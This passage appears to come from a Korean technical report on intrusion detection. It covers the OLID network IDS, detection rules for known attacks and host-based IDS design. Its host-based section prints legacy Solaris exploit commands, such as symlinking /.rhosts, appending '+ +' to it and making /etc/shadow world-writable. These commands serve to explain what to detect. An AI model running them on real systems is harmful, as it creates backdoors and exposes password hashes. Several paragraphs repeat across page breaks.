313 침입탐지분석모델을이용한정형화작업은침입유형의특징에대한분석과탐지기술의적용, 그리고정형화된패턴으로부터침입판정에따른데이터베이스설계등시스템운영에영향을준다. OLID시스템에서사용한분석모델은 ( 그림 J-3) 와같이원으로표시되는 State( 상태 ), 굵은선으로표시되는상태이동의조건 (Condition: Bar), 그리고이동방향을나타내는 Transition( 전이 ) 로침입단계, 탐지분석및판정하는과정을표현하였다. ( 그림 J-3) 침입탐지분석구성요소 1 초기상태 (Initial State) : 침입과관련된행위의시작상태 2 정상상태 (Norma1 State) : 침입과관계없는평범한행위상태 3 경고상태 (Warning State) : 침입으로발전할가능성이있는상태 4 위험상태 (Danger State) : 불법적인자원의변화확인상태 ( 그림 J-4) 는서비스거부공격패턴중, 비정상적인크기의 ICMP 패킷을공격대상시스템에전송하여시스템의정상적인동작을방해하는공격을 OLID시스템에적용한침입탐지분석기법을이용하여나타낸것이다. ( 그림 J-4) Oversize ICMP 공격탐지

314 (3) 침입탐지항목 1 Packet Traffic Counting(Denial of Service Attack) 다량의특정패킷을임의의시스템 / 네트워크에전송하는공격탐지 Chargen Denial of Service Chargen (UDP 19) 패킷을사용하여특정호스트로의 Vulnerability Check 다량의패킷을전송 Echo Denial of Service Echo (UDP 7) 패킷을사용하여특정호스트로의 Vulnerability Check 다량의패킷을전송 Finger (UDP 79) 패킷을사용하여특정호스트로의 Finger Vulnerability Check 다량의패킷전송특정호스트나네트워크를대상으로다량의 ICMP Ping Flooding 패킷전송 TCP를사용한연결에서 ACK패킷의응답없이 SYN Flood 특정호스트로의다량의 SYN 패킷ㆍ전송 Windows Out of Band Window machine에대한 Out of Band 서비스공격을 Vulnerability Check 탐지 (TCP 139 and/or TCP 53):WinNuke 2 Port or Protocol Probing 허가되지않은포트나서비스를사용한침입탐지 Diskless Booting 기능을갖는 RPC 프로그램에서 BootParamd Whoami Decode 공격자는 Bootparamd's Whoami(TCP 43) 을이용하여 Machine의 NIS domainname을얻을수있다. /etc/services(not we1l-known port) 에등록된이외의 IP Unknown Protocol 포트나서비스를이용한침입탐지 IMAP Buffer Overflow IMAP 메일서버 (TCP 143 or 220) 는 root 접근 Vulnerability Check 권한을얻을수있는취약점을이용한공격탐지 RemoteWatch package가설치된 HP/UX는공격자로부터 RemoteWatch 서비스 (TCP 5556) 를 HP/UX Remote Watch 사용하여임의의명령을실행이가능하다. 이는 Vulnerability Check 공격자에게시스템내의취약성들을탐지될수있는위험요소를제공 ISS Scan Check (ICMP Type=8, Code=) 공개용이나상용 ISS(Internet Security Scanner) 를사용하여시스템의취약점을조사하려는공격자의시스템에대한사전점검을사전에포착

315 Rexec Session Decode Talk Flash Vulnerability Check TFTP Vulnerability Check Netstat Vulnerability Check Sysstat Vulnerability Check Kerberos IV User Snarf Vulnerability Check Rexec command(tcp 512) 를사용하여원격지의프로그램을실행시키는것을탐지. - Rexec 사용자체가침입이라고할수없으나침입에많이사용 Talk(UDP 517 and 518) 사용시에사용자가 talk request에대한 Display할때사용스트링에일련의 Escape 스트링을포함하면상대방의스크린에알수없는문자가생성되는일시적인서비스거부공격 TFTP(UDP 69) 서비스를통한접근을탐지원격지의공격자에게시스템정보유출 (TCP15) 원격지의공격자에게시스템정보유출 (TCP11) Kerberos 버전4는서버에조작된패킷 (UDP 750) 을전송함으로 username과 realm information을노출 (UDP Bomb Probing) 3 Detect Simple Intrusion Contents 단순 ( 개인 ) 정보점검직접적인침입에큰영향은없으나특정프로토클혹은서비스를이용하는세션에대하여 Decoding 작업을통하여사용자의접속, 특정부분에대한감시를통하여침입시도 ( 특정시간에서비스사용, 해킹가능성보유자의네트워크사용감시 ) 의가능성을미리대비한다. To 감시가필요한사용자 Form POP(TCP 119) POP Username Decoding 주로메일과관련되어전송되어지는사용자와패스워드에대한감시. POP Password Decoding 특정프로토콜이나서비스를사용하는패킷들의헤더나내용을분석하여침입에직접적인효과를가져올수있는내용탐지. Sendmail old 버전에서 DEBUG 명령을이용하여 DEBUG Vulnerability 공격자가쉽게 root권한을얻을수있는취약점을 Check 이용한침입 Sendmail old 버전에서특정환경에서임의의 machine을 access할수있는 WIZ 명령을 WIZ Vulnerability Check 이용하여공격자가쉽게 root권한을얻을수있는취약점을이용한침입 HTTP Campas Cgi-Bin Vulnerability Check HTTP Glimpse Cgi-Bin Vulnerability Check HTTP PHP Buffer Overflow Vulnerability Check 특정 HTTPD웹서버들에서제공하는 campas cgi-bin script는공격자가웹서버에서임의의명령들을실행시킬수있다. 특정 HTTPD웹서버들에서제공하는 glimpse cgi-bin script는공격자가웹서버에서임의의명령들을실행시킬수있다. 공격자가 PHP cgi-bin 프로그램을이용하여 Buffer Overflowing 공격을탐지

316 4 Address Check 주소를근거로침입에대한감시및판정. 침입의가능성이있는호스트나네트워크로부터의 Source Address Check 접속은침입으로규정침입시스템이감시하는호스트들중접근이 Destination Address Check 제한된호스트로의접속이나외부호스트들중위험한호스트나네트워크로의접근을탐지 5 Special Field/Option Detection : 특정 field Option 조작 특정프로토콜의필드나옵션을조작한침입을탐지 IP패킷의 Routing Option을설정하여, 침입차단시스템이나보안시스템을피하여접근하는침입시 Source Routing 도와 Route Path로부터의심이가는경로삽입을탐지. Old version의시스템에서있었던오류로서 UDP 패킷의특정필드에조작된값을삽입시, 경우에 UDP Bomb 따라서시스템에문제를가져오는침입유형을탐지 6 Abnormal Length Detect 패킷의길이의조작으로인한침입 Ping of Death Denial of Service 수신측에서수용할수없는 Oversize ICMP 패킷 Vulnerability Check (Oversized 을전송하여수신측 Machine이 reboot, crash 등 ICMP ping packet) 의문제를발생시키는침입유형을탐지 7 Input Command Analysis TCP, UDP를이용한특정호스트로의접속하는패킷들을수집하여입력되는 String을분석하여침입에대한유형을분류일반사용자의접근이허용되지않는디렉토리의 Limited Access Directory 접근및생성을탐지 Limited Access Files 일반사용자의 Read, Write, Create, Modify(mode) (Read, Write, Create, Modify) 등에대한불법적인사용을탐지 Limited Command AND option Root나 Superuser만이사용할수있는명령어들을 using - Only Use root/superuser 외부접속으로부터사용되는경우를탐지 ( 침입의 Commands 시도 ) 일련의명령어들이나옵션의사용이침입의 A sequence of Command 의도로서사용되는경우를탐지 (Case by Case)

317 (4) 시스템구조 OLID시스템은 ( 그림 J-5) 와같이기본적으로감사기록수집기 (Audit Record Collector), 작업할당기 (Task Allocator), 침입분석기 (Intrusion Analyzer), 중간조절기 (Coordinator), 실행관리자 (Action Manager), 보안DB(Security DataBase) 로구성되어있다. ( 그림 J-5) OLID 시스템구조 1 감사기록수집기감사기록수집기는시스템시작과더불어수행되는네트워크패킷들을수집하는모듈로서네트워크상에있는침입관련패킷수집및필터링작업을하고, libpcap을이용하여모든종류의네트워크패킷들중침입에자주사용되는 IP패킷과 ICMP패킷만을대상으로 1차필터링작업을수행한다 ( 표 J-3 참조 ). [ 표 J-3] 감사기록수집기의기능 기능 내용 Network Device Check 패킷수집에사용되는네트워크이름점검 Network & Net-Mask Check 현재의 netmask 점검 Packet Dispatch 패킷을메모리에적재 2 작업할당기 (Task Allocator) 작업할당기는침입분석기 (Intrusion Analyzer) 에서동작하는몇개의침입여부판정세부기능에각침입탐지유형에따라적절한작업이이루어지도록패킷축약기능을제공한다

318 3 침입분석기 (Intrusion Analyzer) 침입분석기는침입을판정작업성격에따라단순분석기 (Simple Analyzer), 고난도분석기 (Complex Analyzer), 지능형분석기 (Intelligent Analyzer) 분류기로나뉘어동작한다 ( 표 J-4 참조 ). 구분 단순분석기 (Simple Analyzer) 고난도분석기 (Complex Analyzer) [ 표 J-4] 침입분석기의분류 기능및특징ㆍ최소정보이용침입여부를판정, 빠른응답시간제공ㆍ일반적으로단순비교에의한침입을판정ㆍAddress/Port Probing, Option/Field/Size Check, ㆍ침입관련된정보를조합하여침입을판정ㆍ침입판정을위해약간의축적된정보를요구ㆍTraffic 분석 (DOS) ㆍ침입판정에많은정보를요구, 추가정보필요지능형분석기ㆍ침입판정시지능적 (Expert System) 처리요구 (Intelligent Analyzer) ㆍCommand/Argument Check ( 그림 J-6) 쓰기제한된파일 / 디렉토리에대한침입행위탐지

319 4 중간조절기 (Coordinator) 중간조절기는사용자와분석기의각모듈들사이에서전송및수신되는메시지들을처리하는모듈로분석기들로부터침입판정에따른자료를전송받아입력된내용에따라실행관리자 (Action Manager) 나사용자에게전송받은침입관련자료를임의의보고형식을사용하여보고한다. 또한사용자로부터침입에따른처리관련명령수행및보안데이터베이스를관리기능을제공한다. 5 실행관리자 (Action Manager) 실행관리자는사용자의요구와침입에따른대응행동을처리하는모듈로서사용자로부터입력받은침입에대한적절한조치를취하는침입에대한대응기능을한다 6 보안데이터베이스 (Security Database) 보안DB는각분석기들이탐지하게될침입패턴들이나감사기록수집기에서처리기능, 기타침입판정의근거가되는모든자료들보관한다. (3) 시스템구성 OLID시스템은효율적인시스템설계와확장성제공, 그리고관리자의시스템관리및운영에있어유용성을고려하여개발되었다

320 1 시스템의효율적인설계시스템의효율적인설계로침입탐지기능등의확장성고려설계 2 시스템의확장성제공패킷수집관련하여, 다양한유닉스시스템을지원하는 libpcap 공개라이브러리를사용하여시스템의확장성을고려한개발 3 관리자가설정한세부적인보안규칙적용로컬네트워크내에서시스템들간의제공되는네트워크서비스들과시스템보안등급에의한시스템중심의보안규칙설정과특정 TCP 연결기반으로한침입프로토콜에적용할수있는다양한보안규칙설정기능 4 웹과 JAVA를이용한사용자인터페이스모든시스템에서 OLID시스템을관리할수있음 [ 표 J-5] OLID시스템개발환경 요구사항 세부항목 운영체제 Solaris 2.5, Win95 H/W Sun, PC(Pentium 166MHz 이상권장 ) 사용도구 LIBPCAP ver.0.4a2, Lex & Yacc, Web Server HTTPD (NCSA 1.5.2), Web Browser(Netscape 4.07 이상 ) 사용언어 C-language, Java, Gcc, JDK 1.1.5, CGI사용 1 OLID시스템화면구성 OLID시스템은엔진부분과관리자부분으로나누어실행되고, 반드시사용자인증을걸쳐시스템을관리ㆍ운영할수있다

- Address & Port Probing 프로토콜, 주소, 그리고포트 ( 서비스 ) 에대한침입탐지규칙설정 - DOS & Vulnerable Port

321 ( 그림 J-7) OLID 시스템초기화면 시스템설정침입탐지와관련한시스템설정화면으로 Address & Port Probing, Dos & vulnerable port Probing, Input Command Pattern로구성되어있다. - Address & Port Probing 프로토콜, 주소, 그리고포트 ( 서비스 ) 에대한침입탐지규칙설정 - DOS & Vulnerable Port Probing CERT 등에서발표한침입유형에대한탐지규칙설정 - Input Command Pattern 입력되는문자혹은문자열에대한침입탐지규칙설정 ( 그림 J-8) 침입탐지규칙설정 (Address & Prot Probing)

322 ( 그림 J-9) 침입탐지규칙설정 (DOS & Vulnerable port Probing) ( 그림 J-10) 침입탐지규칙설정 (Input Command Pattern) 시스템동작 OLID시스템은침입확인또는탐지하고자하는시스템주소를관리자로부터최대 255개를받아네트워크를통한불법침입상태를관리할수있다. 만일침입이탐지되면 ( 그림 J-16) 처럼위험도 (level 1 ~ level 3) 에따라경고화면이생긴다

323 ( 그림 J-11) 침입탐지동작화면 또한탐지된침입유형에대한설명을제공하고, 보안관리대상시스템의침입상황을날짜별, 시스템별및침입유형별로제공하여향후정보시스템과네트워크에대한해킹사고방지를위한보안정책수립과시스템에대한보안취약점을쉽게보완할수있도록한다. ( 그림 J-12) 침입상태설명및침입통계현황화면

324 2. 시스템침입탐지기술침입탐지시스템은불법적인사용, 오용, 또는불법적인사용자나의부침입자에의한컴퓨터시스템을남용하는침입을알아내려는시스템이다. 이러한시스템은단일컴퓨터나또는네트워크로연결된여러컴퓨터를감독한다. 침입탐지시스템은감사기록, 시스템테이블, 네트워크부하 (traffic) 기록의자원으로부터사용자행위에대한정보를분석하므로써수행된다. 침입탐지시스템의목표는크게두가지방법으로설명된다. 하나는침입자에의한불법적인사용을명시하는것이고다른하나는합법적인사용자에의한오용이나남용을말한다. 초기에침입탐지시스템은후자를주로나타냈으나, 침입방법이복합적이고다양화됨에따라전자와후자모두처리하는시스템이개발되고있다. 침입탐지에대한현재의기술적, 실제적논점은실제침입이아닌데침입으로판정하는경우 (false positives) 와실제침입인데탐지하지못하는경우 (false negatives) 를어떻게처리하는가에있다. 따라서좋은침입탐지시스템은다음과같은요소를강조한다. 첫째, false positive를제거하는것이다. 둘째, false negative를제거하는것이다. 셋째, 보안관련이벤트는무엇이며어떻게그것을보고할것인지이해하는것이다. 넷째, 침입탐지시스템의테스트방법을고안하는것이다. 다섯째, 탐지된공격은어떤피해를주는지결정하고피해를줄이며공격으로부터복구하는것이다. 여섯째, 오늘날의네트워크에서요구하는크기에변화할수있는시스템을만드는것이다. 침입탐지시스템에서는감사추적분석이필요하다. 보안공격은미리알려지지않는경우가많고완벽한보안을보장하는보안모델은존재하지않기때문이다. 이러한감사자료는다양한침입을기록하고너무방대해질수있는자료를축약할수있어야한다. 또한, 감사자료의분석도구는재사용이가능하여야하고보안책임자가질의하기쉬운인터페이스를제공해야한다. 가. 침입탐지의역사일반적으로침입탐지시스템이라함은컴퓨터시스템의비정상적인사용, 오용, 남용등을규정하는시스템으로가능하면실시간으로처리하는시스템을말한다

1980년대 Anderson이 " 침입 " 에대한개념을정보접근, 정보조작, 시스템무기력화등에대한고의적이면서도불법적인시도의잠재가능성으로정의하였다. 초기에컴퓨터시스템관리자들은막대한양의감사기록 (Audit Record) 정보들로부터보안관리에필요한정보들만을선택적으로수용하고분석하기위해서일일이저장된로그파일들을수작업으로처리하여야했다.

325 1980년대 Anderson이 " 침입 " 에대한개념을정보접근, 정보조작, 시스템무기력화등에대한고의적이면서도불법적인시도의잠재가능성으로정의하였다. 초기에컴퓨터시스템관리자들은막대한양의감사기록 (Audit Record) 정보들로부터보안관리에필요한정보들만을선택적으로수용하고분석하기위해서일일이저장된로그파일들을수작업으로처리하여야했다. 이로부터이를신속하게처리하기위해자동화된 Audit 도구의개발을요구하였으며, 그동안에축적된감사기록분석기술을이용하여감사기록을자동으로분석하여시스템에불법적으로침입하거나해를끼친행위들을찾아내려는시도를하게되었다. 하지만사후에발견되는침입행위는늦은감이없지않았고, 해커들의감사기록삭제시도로인해사고분석및발견이용이하지않은단점이있었다. 또한분산환경과개방환경으로컴퓨팅환경이전환되면서고도화되고분산된공격형태를취하고있는침입기법으로부터시스템을보호하기위해서는실시간으로침입을탐지하고대응할수있는실시간침입탐지시스템을필요로하게되었다. 이러한침입탐지시스템에서의기술적관건은컴퓨터시스템의침입여부를판단하기위한근거를어디에서, 얼마나정확하게, 그리고신속하게찾을수있느냐에달려있다. 그리고침입판정시오판율을줄이는문제도기술적으로지속적인성능향상을통해해결해야할큰과제이다. ( 그림 J-13) 실시간침입탐지시스템의태동

326 나. 침입탐지시스템의기술적분류일반적으로침입탐지시스템은크게다음의두가지분류기준으로나누어볼수있다. 데이터의소스 (Source) 를기반으로하는분류방법 침입의모델을기반으로하는분류방법 (1) 데이터소스를기반으로하는분류데이터소스를기반으로하는분류방법은다음세가지의형태를가진다. 이방법은침입탐지시스템의탐지영역에의한분류라고도볼수있다. 단일호스트기반 (Host Based) 단일호스트로부터생성되고수집된감사 (audit) 데이터를침입여부판정에사용하며, 하나의호스트를탐지영역으로한다. 다중호스트기반 (Multihost Based) 여러호스트들로부터생성되고수집된감사데이터를침입여부판정에사용하며, 여러대의호스트를그탐지영역으로하기때문에호스트간의통신을통해침입판정에필요한정보를교환하게된다. 네트워크기반 (Network Based) 네트워크의패킷데이터를수집하여침입여부판정에사용하며, 침입탐지시스템이설치된네트워크영역전체를탐지대상으로한다. 네트워크의패킷처리능력이침입탐지시스템의성능을결정짓게되므로성능에적합한네트워크를대상으로하여야한다. (2) 침입모델을기반으로하는분류침입모델을기반으로하는분류방법은다음의두가지형태를가지며이방법이대부분의침입탐지시스템을분류하는일반적인분류기준으로받아들여지고있다. 1 비정상적인행위탐지 (Anomaly Detection)

정상적인시스템사용에관한프로파일과시스템상태를유지하고있다가, 이프로파일에서벗어나는행위들을탐지하는방법으로, 정상적인프로파일을생성하는데있어기존의많은데이터를분석하여야하기때문에상대적으로구현비용이크다. ( 그림 J-14) 침입탐지시스템의탐지영역 그러나, 알려지지않은새로운공격기법도탐지해낼수있기때문에이에대한기술개발이활발하게진행되고있다.

327 정상적인시스템사용에관한프로파일과시스템상태를유지하고있다가, 이프로파일에서벗어나는행위들을탐지하는방법으로, 정상적인프로파일을생성하는데있어기존의많은데이터를분석하여야하기때문에상대적으로구현비용이크다. ( 그림 J-14) 침입탐지시스템의탐지영역 그러나, 알려지지않은새로운공격기법도탐지해낼수있기때문에이에대한기술개발이활발하게진행되고있다. 비정상적인행위탐지기법으로제안된방법에는통계적방법, 특징추출, 예측가능한패턴생성, 신경망 (Neural Network) 등다양한방법이있다. 2 오용침입탐지 (Misuse Detection) 시스템의알려진취약점들을이용하여공격하는행위들을사전에공격에대한특징정보를가지고있다가탐지하는방법으로, 시스템감사기록정보에대한의존도가높고상대적으로구현비용이저렴하다. 그러나알려진공격기법에대한탐지능력만을가지고있기때문에최신공격기법에대한계속적인연구가필요하며, 침입시나리오를추가시켜주어야하는어려움이있다. 오용탐지방법에는조건부확률, 전문가시스템, 상태전이분석, 패턴매칭, 키스트로크분석방법등이있다

328 (3) IDS 개발을위한기술적구성요소본절에서는침입탐지시스템의구현을위해서필요한기술적구성요소들에대해설명한다. 각모듈에서최적의성능을발휘할수있어야실시간침입탐지가가능하며, 시스템에피해를주기전에적절한대응조치를취해시스템을다양한공격기법으로부터안전하게보호할수있다. ( 그림 J-15) 은호스트기반침입탐지시스템에대한전체모습을개략적으로보여주고있다. 설계모델을구성하고있는기술적요소들은각모듈이가지고있는기능별로다음의 6가지의모듈로이루어진다. o Audit 시스템모듈 o 정보의가공및축약 (Reduction) 모듈 o 데이터분석및침입탐지 (Analysis & Intrusion Detection) 모듈 o 결과조정 (Result Arbitrator) 모듈 o 사용자인터페이스 (User Interface) 모듈 o 데이터관리인터페이스 (Data Management Interface) 모듈 ( 그림 J-15) 호스트기반침입탐지시스템의전체구조

329 호스트기반침입탐지시스템에서는침입여부판정을위한데이터를호스트의 Audit 시스템을통하여수집한다. 여기서운영체제에서제공하는 Audit 시스템을사용하는것이범용으로사용하기에는좋지만, 그수집능력에는한계가있을수밖에없다. Audit 시스템에서수집된 Audit 데이터를이용하여바로침입탐지분석작업을수행하는것은그데이터의양이너무많기때문에실시간으로침입을탐지하는것을불가능하게한다. 보통일반적인 Audit 시스템을이용하여기록된데이터들의 90% 이상이침입탐지에불필요한데이터이기때문이다. 또한여러 Audit 시스템을거쳐수집된데이터들의형태가각기다르고, Audit 레코드를구성하고있는필드의의미및형태가상이하기때문에불필요한데이터를제거하고, 일련의정해진형태로변환시키는작업을데이터가공및축약모듈에서하게된다. 일정한형태의축약된 Audit 데이터들은침입탐지를위한분석시간을단축시키고효과적으로작업을수행할수있도록한다. 분석및침입탐지엔진을통해침입여부를결정하고판정결과를결과조정 (Result Arbitrator) 모듈에넘겨최종결정을하게한다. 결과조정모듈은침입탐지엔진을구성하는각각의탐지모듈들의결과를종합적으로분석하여, 중복성 (Redundancy) 을제거하고시스템관리자의의지를반영하여조율된 (Coordinated) 최종결과를생성하고이를토대로정해진대응행위를취하게된다. 또한시스템관리자에게사용자인터페이스를통하여그결과를보고한다. 데이터관리인터페이스모듈은축약된 Audit 데이터들과침입탐지결과들에대한저장및검색, 추가, 삭제등에관한관리기능을제공하여, 각모듈들의데이터요구에대한데이터제공기능을수행하며, 사용자인터페이스를통해시스템관리자의요구사항에맞게데이터를가공하여제공한다

330 (4) 호스트기반침입유형분석 1 임의파일생성및변경 UNIX 시스템에서 rlogin이가능한호스트를기록하는 hosts.equiv와.rhosts 파일을원하는곳에생성하거나링크시키는방법으로접근할수있다. 또한, /tmp와같은누구나쓸수있는곳에임의의파일을생성하여해킹에이용할수있다. o admintool admintool은 admintool의오류를이용한공격이다. 임의파일을 /tmp/.group.lock에연결한후 /user/bin/admintool 프로그램을실행하므로써사용자그룹ID를갖는 root 소유의임의파일을생성한다. 예를들어아래와같이수행하면 /.rhosts 파일의그룹이사용자의그룹ID로되어생성된다 # ls /.rhosts /.rhosts: No such file or directory # ln -s /.rhosts /tmp/.group.lock # /usr/bin/admintool 1) 그룹선택 2) root그룹고치기 3) 그룹대상에자신의 ID 추가 4) 확인 ( 에러발생 ) 5) 종료 # echo + + >> /.rhosts o automountd AUTOFS_MOUNT를시키는프로그램을만들어수행하여오류를유발한다. 이결과로지정한호스트의임의파일의퍼미션을변경할수있다. 예를들어, 아래와같이수행하면 localhost에있는 /etc/shadow의퍼미션을 777로변경하게된다 #./automountd localhost /bin/chmod 777 /etc/shadow

331 o kcms_calibrate kcms-calibrate 프로그램의오류를이용한공격방법이다. 먼저, 임의파일을 /tmp/kp_kcms_sys.sem에연결한후 /usr/openwin/bin/kcms_calibrate프로그램을실행한다. kcms라는쉘스크립트프로그램은 kcms_configure 프로그램을수행하고임의파일의내용을변경하는코드가들어있다. 이 kcms를경쟁적으로실행하므로써 kcms_calibrate에서사용하는임시파일 /tmp/kp_kcms_sys.sem 파일의퍼미션을변경하여임의파일을생성하게된다. 예를들어, 아래와같이수행하면 write 퍼미션이허용되는 root 소유의 /.rhosts 파일이생성된다 # ln -s /.rhosts /tmp/kp_kcms_sys.sem # /usr/openwin/bin/kcms_calibrate & # kcms o nispopulate nispopulate 프로그램의오류를이용한공격이다. nispopulate 프로그램을실행시키면임시파일을생성하여사용한후실행이끝나면삭제하게된다. 즉, 이렇게생성하여삭제하기전에임시파일을원하는곳에링크시키면 root 소유의임의파일이생성된다. 예를들어, 아래와같이수행하면임의파일이생성된다. 여기에서 nispop.pl은 perl 스크립트프로그램으로 /tmp/passwd_???? 임시파일에 /.rhosts 파일을링크시키는내용이들어있다 # nispop.pl & # /usr/lib/nispopulate -C 이하스크립트수행 o checkperm chkperm 프로그램의오류를이용한공격이다. /tmp 디렉토리에 ID와같은디렉토리를생성한후 VMSYS를그곳으로설정한다. 생성할임의파일을그디렉토리의.facerc라는파일에링크시킨후 chkperm 프로그램을수행하면 root 소유의임의파일을생성시킬수있다. 예를들어, 아래와같이수행하면 /.rhosts 파일이생성된다

332 # mkdir /tmp/hacker # mkdir /tmp/hacker/lib # setenv VMSYS /tmp/hacker # umask 0000 # ln -s /.rhosts /tmp/hacker/lib/.facerc # /usr/vmsys/bin/chkperm -l -u hacker o license manager 오류 lmstat 프로그램오류를이용한공격이다. 임의파일을 /var/tmp/1ocksuntechd에링크시킨후 lmstat 프로그램을수행시키면 root 소유의퍼미션이 666인파일이생성된다. 다음예에서는 /.rhosts 파일을생성시킨다 # ln -s /.rhosts /var/tmp/locksuntechd # /opt/sunwste/bin/lmstat -c 버퍼오버플로우 (buffer overflow) UNIX내의프로그램을수행하는데명령어와매개변수를전달할때, 매개변수뒤에다른코드를집어넣어버퍼오버플로우를유발시킨다. 이렇게오버플로우가발생했을때쉘프로그램이실행되도록하여관리자권한을얻을수있다. 이러한버퍼오버플로우공격은프로그램을수행하면바로 root 쉘을획득할수있기때문에호스트기반침입의주종을이루고있다. 현재 Solaris 2.x에서알려진버퍼오버플로우공격이가능한것은 rlogin, fdformat, ffbconfig, ping, eject, passwd, ps 등이다. 이프로그램의특징은모두 set user id가설정되어있다는것이다. 버퍼오버플로우공격에대응하기위해 set user id의. 설정을해제하면 UNIX 시스템에서일반사용자에게서비스를할수없기때문에, 패치된프로그램을구해서설치하는것이하나의방법이다. 그러나, 버퍼오버플로우공격은계속해서개발되고있으므로근본적인해결방법이필요하다. 3 시스템오용시스템구성요소의취약점을이용하여공격하는방법이다

333 o IFS 버그대부분의 UNIX 운영체제에서존재한다. IFS (Internal File Separator) 명령어와매개변수사이를구분하는환경변수루트권한으로실행되는대부분의프로그램에서다른프로그램을실행하게될때 system() 혹은 popen() 함수를이용하는데, 바로이부분에서 IFS 가적용된다. setenv IFS / 라고명령어를수행후에 /bin/sh를수행하면 'bin/sh' 로인식하는문제점으로 sysinfo, loadmodule, expreserve, rdist 등의프로그램에서위의문제가발생할수있다. 예를들면, /usr/local/bin/sysinfo라는시스템사양을알려주는명령이있는데, 이것은시스템사양을검사하면서출력하는프로그램으로중간에시스템관리자를검사하는부분이있다. 이부분에서시스템관리자의권한을갖게되는경우가있다. o 연속적인 fork UNIX 시스템에서 fork() 함수는새로운프로세스를생성시키는사용된다. 이러한특성을이용하여 fork() 를계속해서수행하는경우문제가발생한다. UNIX 시스템에서동시에수행되는프로세스수가한정되어있는데, fork() 를여러번수행하여더이상프로세스를생성시킬수없을경우에다다를수있다. 이러한경우시스템에서명령어를입력할수없는상태가되어더이상서비스를할수없게된다. o set user id 쉘스크립트를이용한공격루트권한의 set user id 쉘스크립트는항상문제의소지를가지고있다. 그쉘스크립트파일내에현재디렉토리에서실행되는임의의프로그램이있다면, /bin/sh를수행하게하는또다른쉘스크립트를생성하여현재디렉토리에생성한다. 그러면, 원래의쉘스크립트를수행하였을경우루트권한의쉘이수행되게된다. o sh 명령어를이용한공격 '-x' 의파일생성과그것의실행으로인하여시스템관리자기능획득이가능하다. '-x' 는쉘스크립트를 /bin/sh를띄워서수행하라는의미를갖는다. 따라서 target이라는루트권한 set user id 쉘스크립트파일의경우아래와같이수행하였을때문제발생한다. # ln target -x # -x

o rsh, rcp 명령어를이용한공격 rsh과 rcp 명령어를이용해서원격시스템에트로이목마파일을복사한다. 스택버퍼를초과시켜쉘재부팅을하게되면, 사용자는그쉘공간에트로이목마를두고관리자의허가제어에따라쉘충돌후실행되게할수있다. o rlogin을이용한공격 /etc/hosts.equiv, $HOME/.rhosts 파일에기록된호스트는 rlogin 가능한곳이다.

334 o rsh, rcp 명령어를이용한공격 rsh과 rcp 명령어를이용해서원격시스템에트로이목마파일을복사한다. 스택버퍼를초과시켜쉘재부팅을하게되면, 사용자는그쉘공간에트로이목마를두고관리자의허가제어에따라쉘충돌후실행되게할수있다. o rlogin을이용한공격 /etc/hosts.equiv, $HOME/.rhosts 파일에기록된호스트는 rlogin 가능한곳이다. 위파일에적힌호스트는신뢰하는호스트 (trusted host) 라고선언한것이므로이러한정보를이용하면원격시스템에서사용자에대한인증없이로그인을허용할수있다. o 패스워드추측일반적으로 UNIX 시스템에서는로그인할때 ID와패스워드입력을세번으로제한하고있다. CRACK과같은패스워드검사프로그램으로패스워드추측공격을할수있는데, 이러한경우로그인횟수를검사하여원격로그인사이트를제한할수있다. o 로그파일보존여부조사해커가시스템에침입하면자신이침입했다는사실을숨기기위해뒷문 (backdoor) 프로그램을설치하여로그파일을수정하거나삭제한다. 따라서이러한로그파일은불법적으로변경되거나삭제되는것을방지해야한다. 즉, 주기적인로그파일의불법적인변경여부검사가필요하다. o login 프로세스에쉘생성절차이상트로이목마등의프로그램에의하여로그인과정이정상적인방법으로수행되지않는경우이다. 한번침입했던해커는재침입이용이하도록하기위해트로이목마프로그램을설치해놓는다. 이프로그램은나중에해커가그시스템으로접속할때임의의패스워드만입력하면바로루트쉘을획득할수있도록한다. (4) 시스템모듈및구조 ( 그림 J-16) 침입탐지시스템구조

전체적인모듈간의관계는 ( 그림 J-16) 와같다. 시스템호출로거, 침입탐지기, 침입상황표시기는실시간탐지를위하여시스템에서함께동작된다. 탐지모듈생성기는새로운침입패턴을추가하는작업이있을때만동작된다. 시스템호출로거에서프로그램의시스템호출내용이로그파일에기록한다. 이로거는 Sun Solaris에서제공하는 BSM(Basic Security Module) 을사용한다.

335 전체적인모듈간의관계는 ( 그림 J-16) 와같다. 시스템호출로거, 침입탐지기, 침입상황표시기는실시간탐지를위하여시스템에서함께동작된다. 탐지모듈생성기는새로운침입패턴을추가하는작업이있을때만동작된다. 시스템호출로거에서프로그램의시스템호출내용이로그파일에기록한다. 이로거는 Sun Solaris에서제공하는 BSM(Basic Security Module) 을사용한다. 탐지모듈생성기에서는침입패턴에따라처리모듈을생성한다. 실시간침입탐지를수행하는침입탐지기에서는로그파일을읽어처리모듈을적용하여침입을감시한다. 침입탐지기는탐지결과를침입상태파일에주기적으로기록한다. 침입상황표시기에서그파일을읽어웹브라우져에표시한다. 1 로깅시스템시스템호출을기록하는프로그램이다. BSM을이용하여시스템호출을로그파일에기록한다. 여기에서필요한것은세가지로요약할수있다. 첫째, BSM에서얻을수있는내용이무엇인지분석이필요하다. 이내용에따라침입패턴의분류와정형화가이루어진다. 둘째, 로그내용중침입패턴과관계가있는내용을선별하는것이필요하다. 이것은첫번째내용의결과에따라결정된다. 시스템호출기록은로그파일이커지는현상이나타날수있기때문에침입탐지에필요한기록을분류하는방법이필요한것이다. 또한, 로깅으로인한시스템성능저하를줄이기위해서탐지에필요한시스템호출만을기록한다. 셋째, 로그파일을침입탐지에이용하기쉽도록가공하는것과크기를줄이기위해압축하는방법이다. 실시간침입탐지가이루어져야하기때문에압축하는방법은사용하지않는다. 위의두번째내용에따라로그내용중필요없는부분을제거하고침입탐지에필요한자료구조를갖도록할것이다. ( 그림 J-17) audit trail 에기록되는 token 종류

